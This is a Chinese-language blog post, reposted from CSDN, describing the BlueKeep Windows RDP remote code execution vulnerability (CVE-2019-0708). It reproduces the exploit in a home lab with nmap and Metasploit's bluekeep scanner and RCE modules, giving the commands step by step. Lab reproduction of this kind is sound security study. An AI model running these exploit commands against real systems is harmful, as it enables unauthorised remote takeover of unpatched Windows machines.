漏洞介绍
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。
漏洞原理
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。
影响版本
目前已知受影响的 Windows 版本包括但不限于:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影响
漏洞复现
复现环境
windows11(本机)192.168.2.51
windows7(虚拟机)192.168.2.44 桥接
kali2022.1(虚拟机)192.168.2.248 桥接
复现过程
首先windows7开启了3389端口,关闭了防火墙
登录kali2022.1,用自带的namp进行端口扫描windows7,发现3389端口开启
nmap 192.168.2.44
打开msf
msfconsole
查找cve-2019-0708,存在POC和EXP
search cve-2019-0708
先选择POC判断漏洞是否存在,确定漏洞存在
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.2.44
run
退回
back
使用EXP进行攻击,拿到权限
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.2.44
show options
show targets
set target 5
run
本文转载自: https://blog.csdn.net/weixin_45632448/article/details/125287990
版权归原作者 青果@ 所有, 如有侵权,请联系我们删除。
版权归原作者 青果@ 所有, 如有侵权,请联系我们删除。